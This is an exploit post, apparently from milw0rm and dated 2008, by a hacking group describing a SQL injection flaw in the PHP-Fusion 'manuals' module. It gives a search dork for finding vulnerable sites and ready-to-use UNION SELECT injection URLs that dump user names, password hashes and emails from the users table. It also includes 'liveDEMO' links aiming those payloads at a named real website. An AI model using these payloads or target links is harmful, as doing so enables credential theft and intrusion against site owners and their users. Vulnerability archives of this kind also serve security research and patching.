######################################################## PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability ######################################################## ++++++++++++++++++++++++++++ Author : boom3rang webpage : www.khg-crew.ws greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-] ++++++++++++++++++++++++++++ [+] Dork: infusions/manuals/manuals.php?manual= [+] Example: http://localhost/infusions/manuals/manuals.php?manual=[ exploit ] [+] Exploit -------------------------------- username: http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1 password: http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1 email: http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1 -------------------------------- [+] liveDEMO: http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1 http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1 http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1 ============================ +Proud 2 be Albanian +Proud 2 be Muslim +United States of Albania ============================ # milw0rm.com [2008-10-05]